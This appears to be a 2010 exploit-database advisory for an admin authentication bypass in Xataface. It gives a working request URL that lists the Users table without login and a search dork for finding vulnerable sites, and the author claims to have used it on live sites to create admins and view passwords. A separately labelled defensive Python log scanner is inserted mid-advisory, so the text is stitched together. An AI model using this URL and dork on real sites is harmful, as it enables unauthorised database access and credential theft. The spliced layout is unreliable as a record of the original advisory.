Xataface - Admin Authentication Bypass



EKU-ID: 19113 CVE: OSVDB-ID:
Author: Xinapse Published: 2010-03-23 Verified: Verified


=======================================================
Xataface Admin Auth Bypass Vulnerability
=======================================================
#[+] Discovered by : Xinapse
#[+] Site          : firewire-security.com
#[+] Email         : admin@firewire-security.com

=======================================================
=======================================================

#[+] Vulnerability : Admin/database auth bypass vulnerability
#[+] Software      : Xataface - open source GPL, PHP, MySQL database software
#[+] Vendor        : http://xataface.com
#[+] Usage         : http://www.site.com/admin.php?-action=view&-table=Users&-cursor=0&-skip=0&-limit=30&-mode=list


#[+] Alert         : Most of the sites I tried running this software are vulnerable; only a few used .htaccess
#[+] Dork          : "powered by dataface" "powered by xataface"
#[+] Description   : With this I could edit/delete/create records in the database, create new admin accounts, and view all the users and passwords.
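As an added defender-side example (not part of this advisory or of Xataface itself), a small Python scanner over constructed Apache access-log lines that flags admin.php requests carrying Xataface's -action/-table parameters and separates the ones the server answered from the ones it challenged, as an .htaccess rule would. The log lines, IP addresses, table names and severity labels are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-log sample (not taken from the advisory).
SAMPLE_LOG = """\
203.0.113.5 - - [23/Mar/2010:10:01:02 +0000] "GET /admin.php?-action=view&-table=Users&-cursor=0&-skip=0&-limit=30&-mode=list HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
203.0.113.5 - - [23/Mar/2010:10:01:09 +0000] "GET /admin.php?-action=new&-table=Users HTTP/1.1" 200 4011 "-" "Mozilla/5.0"
198.51.100.7 - - [23/Mar/2010:10:02:00 +0000] "GET /index.php?-action=list&-table=Products HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [23/Mar/2010:10:02:10 +0000] "GET /about.html HTTP/1.1" 200 900 "-" "Mozilla/5.0"
203.0.113.5 - - [23/Mar/2010:10:03:00 +0000] "GET /admin.php?-action=view&-table=Users HTTP/1.1" 401 210 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

# Xataface's front controller reads dash-prefixed parameters; these two
# select the operation and the table a request touches.
WATCHED = ("-action", "-table")
# Tables whose unauthenticated exposure the advisory singles out (assumed name).
SENSITIVE_TABLES = {"users"}

def classify(line):
    """Return a finding dict for a Xataface admin.php request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["url"])
    if not parts.path.endswith("/admin.php"):
        return None
    qs = parse_qs(parts.query)
    params = {k: qs[k][0] for k in WATCHED if k in qs}
    if not params:
        return None
    status = int(m["status"])
    # A 2xx means the admin entry point answered the request; 401/403 means
    # the web server (e.g. an .htaccess rule) challenged or refused it.
    served = 200 <= status < 300
    table = params.get("-table", "").lower()
    severity = ("high" if served and table in SENSITIVE_TABLES
                else "medium" if served else "blocked")
    return {"ip": m["ip"], "ts": m["ts"], "status": status,
            "severity": severity, **params}

def scan(log_text):
    """Classify every line; returns the findings in log order."""
    return [f for f in (classify(l) for l in log_text.splitlines()) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A "high" or "medium" hit that has no matching authenticated session in the application's own logs is the case to investigate.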
#[+] Greetz        : firewire-security team, b10h4z4rd, g3org3